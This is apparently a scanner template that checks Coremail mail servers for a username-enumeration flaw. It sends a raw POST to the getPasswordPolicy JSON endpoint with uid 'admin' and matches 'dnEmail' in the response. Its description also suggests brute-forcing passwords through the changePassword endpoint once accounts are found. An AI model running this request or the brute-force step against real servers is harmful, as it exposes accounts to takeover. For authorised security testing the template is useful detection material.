id: coremail-username-enumeration

info:
  name: Coremail用户名枚举
  author: a16
  severity: high
  verified: true
  description: |
    1day接口用户名枚举 枚举后可利用/coremail/s/json?func=user:changePassword接口爆破。
    如果返回值里面带有@xxx.com就是存在的，aliasEmails 为别名邮箱

set:
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |
        POST /coremail/s/json?func=user:getPasswordPolicy HTTP/1.1
        Host: {{hostname}}
        Content-Length: 15
        Accept: text/x-json
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7
        Connection: close
        
        {"uid":"admin"}
    expression: response.status == 200 && response.body.bcontains(b'dnEmail') && response.body.bcontains(b'code')
expression: r0()